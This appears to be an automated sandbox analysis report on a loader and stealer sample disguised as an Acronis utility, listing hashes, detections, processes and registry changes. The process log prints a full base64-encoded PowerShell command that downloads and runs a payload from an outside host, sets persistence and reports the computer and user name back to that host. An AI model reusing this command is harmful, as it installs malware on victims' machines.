File name:

2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch

Full analysis: https://app.any.run/tasks/394a0c60-f5b5-43b3-af2f-4db53d21037c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 21, 2024, 03:46:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
lumma
stealer
crypto-regex
golang
pastebin
loader
autoit
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 6 sections
MD5:

40F9287E828DB87DD3259B53585ADF31

SHA1:

6622AB252D7EB53C8204C9939E514C021B5B50D5

SHA256:

5EDFC69B348477464FBF4A9434F9FF3C361E818DD6FB40BDC5B99CA31E1C3D38

SSDEEP:

98304:sqTAWJqWt5uOveevUoJSKzzbNHsSM7/pKLqb/zsK+f97zP:fJ3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)

    • Changes powershell execution policy (Bypass)

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
      • powershell.exe (PID: 3040)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 1920)
      • powershell.exe (PID: 2040)

    • LUMMA has been detected (SURICATA)

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)

  • SUSPICIOUS

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 3040)

    • Application launched itself

      • powershell.exe (PID: 3040)

    • Starts POWERSHELL.EXE for commands execution

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
      • powershell.exe (PID: 3040)

    • Executable content was dropped or overwritten

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 3040)

    • The process executes Powershell scripts

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 3040)

    • Starts application with an unusual extension

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)

    • Starts the AutoIt3 executable file

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)

    • Found regular expressions for crypto-addresses (YARA)

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)

  • INFO

    • Application based on Golang

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.3)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit, No debug
PEType: PE32
LinkerVersion: 3
CodeSize: 3499520
InitializedDataSize: 311808
UninitializedDataSize: -
EntryPoint: 0x4fa70
OSVersion: 4
ImageVersion: 1
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.109
ProductVersionNumber: 1.0.0.109
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: ASCII
CompanyName: Acronis International GmbH
FileDescription: Local GRPM mini
FileVersion: 1.0.0-109
LegalCopyright: Copyright (C) Acronis International GmbH, 2002-2024
LegalTrademarks: Acronis International GmbH. All rights reserved.
OriginalFileName: grpm-mini.exe
ProductName: Local GRPM mini
ProductVersion: 1.0.0-109
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
127
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start #LUMMA 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs htakba.com no specs

Process information

PID
CMD
Path
Indicators
Parent process
1920"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NOpr -eX BYPaSs -wiNdoWSt Hidd -e JABvAGYAYgB3AD0AJwBoAEsAYwBVADoAXABTAG8AZgBUAHcAQQByAGUAXABDAEwAQQBTAHMARQBzAFwAJwA7ACAAJABLADIAVABmAHoAPQAnAGMAOgBcAHAAUgBvAGcAUgBBAE0AIABGAGkAbABlAHMAXAAnADsAIAAkAG4AUwBrAEYANwA9ADAAOwAgACQANQA4ADQAZgA9ACgAZwBFAFQALQB3AE0AaQBPAEIASgBlAEMAVAAgAC0AQwBsAGEAcwBTACAAVwBpAE4AMwAyAF8AYwBPAG0AUABVAFQARQBSAFMAeQBzAFQAZQBtACkALgBwAEEAcgBUAE8AZgBEAG8AbQBBAGkAbgA7ACAAJABYAFQAVQA4AD0AJwBoAGsAYwBVADoAXABzAG8AZgBUAHcAQQByAGUAXAAnADsAIAAkAEsAaQByAEgAPQAnAEgAawBMAE0AOgBcAHMAbwBGAHQAdwBBAHIARQBcAEMAbABBAFMAcwBlAHMAXAAnADsAIAAkADUAdAB2AFoAUAA9ACQAZQBOAHYAOgBMAE8AYwBBAGwAYQBwAHAAZABhAFQAYQArACcAXABQAFIATwBHAFIAQQBtAHMAXAAnADsAIAAkAHYAagBUAEEAPQBAACgAIAAkAE8AZgBiAFcAKwAnAEEATwBwAFAAJwA7ACAAJABvAGYAYgBXACsAJwBrAGUARQBwAGsARQBZACcAOwAgACQASwBpAHIASAArACcAQgBDAHYAQQB1AEwAVAAnADsAIAAkADUAVABWAFoAcAArACcASwBlAGUAUABrAEUAeQAtAEQAZQBzAEsAVABvAFAAXABrAGUARQBwAGsARQB5ACAARABlAHMAawBUAG8AcAAuAGUAWABFACcAOwAgACQAeAB0AFUAOAArACcAUgBFAEEATAAgAHMAZQBjAHUAcgBJAFQAeQBcAEIAQwBWAEEAdQBMAFQAJwA7ACAAJABvAEYAYgBXACsAJwBDAHkAUABoAGUAUgBvAGMAawAnADsAIAAkADUAdAB2AFoAUAArACcAVAByAEUAegBPAFIAIABTAFUASQBUAEUAXAB0AHIARQBaAE8AcgAgAFMAVQBJAHQARQAuAGUAeABFACcAOwAgACQAeAB0AHUAOAArACcAbQBJAEMAUgBPAHMATwBmAHQAXAB3AEkAbgBkAG8AVwBTAFwAYwBVAHIAcgBFAE4AVAB2AGUAcgBTAEkAbwBOAFwAdQBuAEkAbgBzAHQAQQBMAGwAXABiAGkAVABiAE8AeABBAFAAcAAnADsAIAAkADUAVAB2AFoAcAArACcAYwB5AHAASABFAFIAbwBjAGsAIABDAFkAcwBZAE4AQwBcAEMAWQBQAGgARQByAG8AYwBrACAAQwBZAFMAeQBuAEMALgBlAFgAZQAnADsAIAAkAEsAMgBUAGYAegArACcAQgBpAFQAYgBvAHgAXABCAEkAdABiAG8AWAAuAEUAeABFACcAOwAgACQAbwBGAGIAVwArACcAbwBOAGUASwBFAFkALQB3AEEAbABMAGUAdAAnADsAIAAkADUAdAB2AHoAUAArACcAawBlAEUAVgBPAC0AVwBBAEwATABFAFQAXABLAGUARQBWAG8AIABMAEkAbgBrAC4AZQBYAEUAJwA7ACAAJABvAEYAQgBXACsAJwBMAEkAcQBVAGkARABuAGUAVAB3AG8AUgBrACcAOwAgACQAbwBGAEIAVwArACcAdAByAGUAWgBvAFIAUwBVAEkAdABFACcAOwAgACQAawAyAHQARgBaACsAJwBiAGwAbwBDAEsAUwBUAFIAZQBhAE0AXABCAGwATwBjAEsAcwB0AFIAZQBhAE0AIABHAFIAZQBlAE4AXABCAEwATwBDAGsAcwB0AHIARQBBAE0AIABHAHIAZQBFAG4ALgBlAHgARQAnADsAIAAkAGsASQByAEgAKwAnAGwAZQBkAGcAZQByAGwAaQB2AGUAJwA7ACAAJABYAHQAdQA4ACsAJwBiAEkAVABiAE8AeABBAHAAcAAnADsAIAAkAEsAMgB0AEYAWgArACcATwBuAEUAawBlAFkAXABvAG4AZQBLAEUAeQAuAGUAeABFACcAOwAgACQAbwBmAEIAdwArACcAawBFAGUAVgBPACcAOwAgACQASwAyAFQAZgBaACsAJwBCAEMAIABWAGEAVQBMAFQAXABCAEMAdgBBAFUATAB0AC4ARQB4AEUAJwA7ACAAJAA1AFQAdgB6AHAAKwAnAHIAQQBiAEIAWQAtAGQARQBTAEsAVABvAFAAXAByAGEAQgBiAFkAIABkAGUAcwBrAHQAbwBQAC4ARQB4AGUAJwA7ACAAJABLADIAVABGAFoAKwAnAEwAZQBkAGcAZQByACAATABpAHYARQBcAEwAZQBEAEcARQByACAAbABJAFYAZQAuAGUAWABlACcAOwAgACkAOwAgACQAcgB6AFEAYQA1AD0AJABWAEoAVABhAC4ATABFAE4ARwB0AGgAOwAgAEkARgAgACgAJAA1ADgANABGACkAIAB7ACQAbgBTAEsAZgA3AD0AMQB9ACAAZQBsAFMARQAgAHsAIABGAG8AUgAgACgAJABnAGsAWABsAD0AMAA7ACAAJABnAGsAWABMACAALQBsAFQAIAAkAHIAWgBxAGEANQAgAC0AYQBOAGQAIAAkAG4AcwBrAEYANwAgAC0ARQBxACAAMAA7ACAAJABnAEsAeABMACsAKwApACAAewAgAGkAZgAgACgAdABlAHMAdAAtAHAAYQBUAEgAIAAkAHYASgB0AGEAWwAkAEcAawB4AEwAXQApACAAewAkAG4AUwBLAEYANwA9ADEAfQA7AH0AOwB9ADsAIABpAEYAIAAoACQAbgBTAEsARgA3ACAALQBFAFEAIAAxACkAIAB7ACAAWwBuAEUAVAAuAHMAZQBSAHYASQBjAGUAUABPAEkATgBUAG0AQQBOAGEAZwBFAFIAXQA6ADoAcwBFAGMAVQBSAGkAdABZAHAAUgBPAHQATwBjAG8ATAAgAD0AIABbAE4AZQB0AC4AUwBFAGMAdQBSAGkAdAB5AFAAUgBvAHQAbwBDAG8AbABUAHkAUABlAF0AOgA6AHQATABTADEAMgA7ACAAJABVADkAcwBPAHQAeQA9ACcAaAB0AHQAcABzADoALwAvAHMAbgBvAHcAcQB1AGUAZQBuAC4AcwBpAHQAZQAvAHMAbgBvAHcAegAvAHMAbgBvAHcALgB6AGkAcAAnADsAIAAkAHkAdABCAGQANABTAD0AJwBEAGUAZgByAGEAZwBDAGwAaQBlAG4AdAAnADsAIABDAGgARABJAFIAIAAkAEUATgBWADoAYQBQAHAAZABhAHQAQQA7ACAAJABKADgAZgBlAHEAeAByAFcAPQBHAEUAdAAtAEMATwBtAE0AQQBuAEQAIABTAFQAYQByAFQALQBCAGkAdABTAHQAcgBhAE4AUwBmAGUAcgAgAC0ARQBSAFIATwBSAGEAYwB0AEkATwBOACAAUwBpAEwARQBOAFQAbAB5AGMATwBOAFQASQBOAHUARQA7ACAAJABXAHAAaABiAEEATwBxAFcAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBBAHAAcABkAGEAdABBACwAIAAkAHkAdABCAGQANABTADsAIABUAHIAWQAgAHsAIABOAGUAdwAtAGkAVABFAG0AIAAtAHAAYQBUAGgAIAAkAGUAbgBWADoAQQBQAHAARABhAFQAQQAgAC0ATgBBAE0ARQAgACQAeQB0AEIAZAA0AFMAIAAtAGkAVABlAE0AVABZAHAARQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAAQQBkAGQALQBUAHkAcABlACAALQBBAFMAUwBlAG0AYgBsAHkAbgBBAG0AZQAgAFMAeQBTAHQAZQBNAC4ASQBPAC4AQwBvAE0AcAByAEUAcwBTAGkATwBOACwAIABzAFkAUwBUAGUAbQAuAGkAbwAuAEMATwBNAFAAcgBlAHMAcwBpAG8AbgAuAGYAaQBsAEUAUwBZAFMAVABlAG0AIAAtAGUAUgBSAE8AUgBhAEMAdABJAE8ATgAgAFMASQBsAGUAbgB0AGwAWQBjAE8AbgBUAEkATgB1AEUAOwAgACQAbwBUAHYAUQBUAG0AVAA9ACgAQwBVAFIAbAAgAC0AVQByAGkAIAAkAFUAOQBzAE8AdAB5ACAALQBVAHMARQBCAEEAUwBJAEMAUABBAFIAUwBJAG4AZwApAC4AYwBPAG4AVABlAE4AdAA7ACAAJAB1AHAASwAzADgANgA9AG4ARQB3AC0ATwBiAGoAZQBjAHQAIABzAFkAUwBUAGUAbQAuAGkATwAuAE0ARQBNAE8AcgBZAHMAVAByAEUAQQBNADsAIAAkAHUAcABLADMAOAA2AC4AdwByAGkAVABlACgAJABvAFQAdgBRAFQAbQBUACwAIAAwACwAIAAkAG8AVAB2AFEAVABtAFQALgBMAEUATgBHAHQASAApADsAIAAkAHUAcABLADMAOAA2AC4AcwBFAEUAawAoADAALAAgAFsAUwBZAFMAVABlAE0ALgBJAE8ALgBzAGUARQBrAG8AcgBpAEcAaQBuAF0AOgA6AEIARQBHAGkATgApACAAfAAgAG8AdQBUAC0ATgB1AGwATAA7ACAAJABiADEAcwBhAHEAcQBRAHIAPQBuAEUAdwAtAG8AYgBqAEUAYwB0ACAAcwBZAHMAdABlAE0ALgBJAE8ALgBDAE8AbQBQAHIARQBzAFMASQBPAG4ALgBaAEkAcABBAHIAYwBIAEkAdgBFACgAJAB1AHAASwAzADgANgAsACAAWwBzAFkAUwB0AEUAbQAuAEkAbwAuAGMAbwBNAHAAUgBFAHMAUwBJAG8AbgAuAFoASQBQAGEAUgBjAEgASQB2AEUATQBPAEQARQBdADoAOgBSAGUAYQBkACkAOwAgAGYATwBSAGUAQQBDAGgAKAAkAFoAZQBaAHEAcwBIACAAaQBuACAAJABiADEAcwBhAHEAcQBRAHIALgBlAG4AdAByAEkARQBzACkAIAB7ACAAJABCAFkAdQBjADgATQA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABXAHAAaABiAEEATwBxAFcALAAgACQAWgBlAFoAcQBzAEgALgBOAGEATQBFADsAIAAkADYAMwBZADMAcgBqADUARgA9ACQAWgBlAFoAcQBzAEgALgBvAHAAZQBOACgAKQA7ACAAJABGADUAWQBkAFcAOABGAD0AWwBTAHkAcwB0AGUAbQAuAGkAbwAuAGYASQBMAEUAXQA6ADoAQwByAGUAYQBUAGUAKAAkAEIAWQB1AGMAOABNACkAOwAgACQANgAzAFkAMwByAGoANQBGAC4AQwBvAHAAWQB0AG8AKAAkAEYANQBZAGQAVwA4AEYAKQA7ACAAJABGADUAWQBkAFcAOABGAC4AYwBMAG8AcwBlACgAKQA7ACAAJAA2ADMAWQAzAHIAagA1AEYALgBjAGwAbwBTAGUAKAApADsAfQAgACQAYgAxAHMAYQBxAHEAUQByAC4AZABJAHMAUABPAHMARQAoACkAOwAgACQAdQBwAEsAMwA4ADYALgBEAGkAcwBQAG8AUwBFACgAKQA7ACAAfQAgAGMAYQB0AGMAaAAgAHsATgBlAHcALQBpAFQARQBtACAALQBQAEEAVABIACAAJABFAG4AdgA6AGEAUABwAEQAQQB0AGEAIAAtAG4AQQBNAGUAIAAkAHkAdABCAGQANABTACAALQBpAHQAZQBtAHQAeQBwAGUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQASQB1ADQAWgBuADEAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAG4AbwB3AHEAdQBlAGUAbgAuAHMAaQB0AGUALwBzAG4AbwB3AHoALwAnADsAIAAkAHQASQBWAHAAcABrAEIAPQBAACgAJwBUAEMAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcALAAgACcAbgBzAG0AXwB2AHAAcgBvAC4AaQBuAGkAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAHAAYwBpAGMAYQBwAGkALgBkAGwAbAAnACwAIAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAEgAVABDAFQATAAzADIALgBEAEwATAAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBOAFMATQAuAEwASQBDACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AaQBuAGkAJwAsACAAJwBQAEMASQBDAEwAMwAyAC4ARABMAEwAJwApADsAIABJAEYAIAAoACQASgA4AGYAZQBxAHgAcgBXACkAIAB7ACAAJAB0AEkAVgBwAHAAawBCACAAfAAgAEYAbwByAEUAQQBDAEgALQBvAGIAagBFAEMAdAAgAHsAIAAkAEcAMQA2AFEANABhAFUAPQAkAEkAdQA0AFoAbgAxACsAJABfADsAIAAkAEoAbgBzAEEANQBmAHgAVQA9ACQAVwBwAGgAYgBBAE8AcQBXACsAJwBcACcAKwAkAF8AOwAgAFMAdABhAFIAdAAtAGIASQB0AFMAVABSAEEATgBzAEYAZQBSACAALQBzAE8AdQByAEMARQAgACQARwAxADYAUQA0AGEAVQAgAC0ARABFAFMAVABJAE4AYQBUAGkAbwBOACAAJABKAG4AcwBBADUAZgB4AFUAOwAgAH0AOwB9ACAAZQBMAHMAZQAgAHsAIAAkAHQASQBWAHAAcABrAEIAIAB8ACAAZgBPAHIAZQBhAGMAaAAtAE8AQgBqAEUAQwB0ACAAewAgACQARwAxADYAUQA0AGEAVQA9ACQASQB1ADQAWgBuADEAKwAkAF8AOwAgACQASgBuAHMAQQA1AGYAeABVAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAFcAcABoAGIAQQBPAHEAVwAsACAAJABfADsAIAAkAHgAUQBmAHkANABGAGUAcwA9ACcAYgBJAHQAcwBhAEQATQBJAG4ALgBlAFgARQAgAC8AdAByAEEAbgBTAGYAZQByACAAWAA1AHkANgBZAEoAIAAvAGQATwBXAG4ATABvAEEARAAgAC8AUABSAGkATwByAEkAVAB5ACAATgBPAHIAbQBhAGwAIAAnACsAJABHADEANgBRADQAYQBVACsAJwAgACcAKwAkAEoAbgBzAEEANQBmAHgAVQA7ACAAJgAgACQAeABRAGYAeQA0AEYAZQBzADsAfQA7ACAAfQA7ACAAfQA7ACAAJAA2AGEATABaAHcAVQA9AEcAZQB0AC0ASQB0AEUAbQAgACQAVwBwAGgAYgBBAE8AcQBXACAALQBmAG8AUgBDAGUAOwAgACQANgBhAEwAWgB3AFUALgBBAHQAdABSAEkAQgBVAFQAZQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIABDAGQAIAAkAFcAcABoAGIAQQBPAHEAVwA7ACAAJABQAEsAYQBUAGgAeAB2ADQAPQAkAFcAcABoAGIAQQBPAHEAVwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnACAALQBKAE8AaQBuACAAJwBcACcAOwAgAE4AZQBXAC0ASQB0AEUATQBwAFIAbwBQAGUAUgBUAHkAIAAtAFAAYQB0AEgAIAAnAGgAawBDAHUAOgBcAFMATwBmAHQAdwBhAHIARQBcAE0ASQBDAFIAbwBTAE8AZgB0AFwAVwBJAE4ARABPAFcAUwBcAEMAdQByAFIAZQBuAFQAdgBlAFIAUwBJAG8ATgBcAHIAdQBuACcAIAAtAG4AQQBNAGUAIAAkAHkAdABCAGQANABTACAALQBWAGEATABVAGUAIAAkAFAASwBhAFQAaAB4AHYANAAgAC0AcABSAG8AUABFAFIAVAB5AHQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAHMAVABhAFIAVAAgAEMATABJAEUAbgBUADMAMgAuAEUAWABFADsAIAAkADMAMgBIAGEATwA9AHAAcwAgAGMAbABpAGUAbgB0ADMAMgAgAC0AZQByAHIAbwByAGEAQwB0AGkATwBuACAAcwBpAEwAZQBOAFQATAB5AEMATwBOAHQASQBuAHUAZQA7ACAAJABTAGYAYgAwAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBuAG8AdwBxAHUAZQBlAG4ALgBzAGkAdABlAC8AcwBuAG8AdwBzAC8AcgBlAGMAYQBsAGwAaQBuAGcALgBwAGgAcAA/AGMAcABuAG0AZQA9ACQARQBuAHYAOgBjAE8ATQBwAHUAdABlAHIATgBBAE0ARQAmAHUAcwBuAG0AZQA9ACQAZQBuAFYAOgBVAHMARQByAE4AQQBtAEUAJgBwAGEAcgBhAG0APQAiADsAIABJAEYAIAAoACQAMwAyAEgAYQBPAC4AaQBkACkAIAB7ACAAJABxAHQAZgBDAEQAPQAkAFMAZgBiADAAKwAnAHAASABxAEIAJwA7ACAAVwBnAGUAdAAgACQAcQB0AGYAQwBEACAALQB1AHMARQBCAEEAUwBJAEMAcABBAHIAUwBJAG4ARwA7AH0AIABlAGwAcwBlACAAewAgACQAcQB0AGYAQwBEAD0AJABTAGYAYgAwACsAJwBrAHoAaABVADIAJwA7ACAAVwBnAGUAdAAgACQAcQB0AGYAQwBEACAALQBVAHMAZQBiAGEAcwBpAGMAcABhAHIAUwBpAE4ARwA7AH0AOwAgAH0AOwA=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2040powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\FV7G1B3794XBRS1N5K65T1TJPK.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2972"C:\Users\admin\AppData\Roaming\HTAKBA.com" "C:\Users\admin\AppData\Roaming\YCD7OD.bin"C:\Users\admin\AppData\Roaming\HTAKBA.com2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script (Beta)
Exit code:
0
Version:
3, 3, 15, 1
Modules
Images
c:\users\admin\appdata\roaming\htakba.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
3040powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\KLF1UAJT1APXUZQG55I8RRRQYR.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5376\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5696"C:\Users\admin\Desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe" C:\Users\admin\Desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
explorer.exe
User:
admin
Company:
Acronis International GmbH
Integrity Level:
MEDIUM
Description:
Local GRPM mini
Exit code:
0
Version:
1.0.0-109
Modules
Images
c:\users\admin\desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ole32.dll
6092\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 741
Read events
17 727
Write events
14
Delete events
0

Modification events

(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
1
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Roaming\YCD7OD.bin
MD5:
SHA256:
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04bvay3o.mvx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
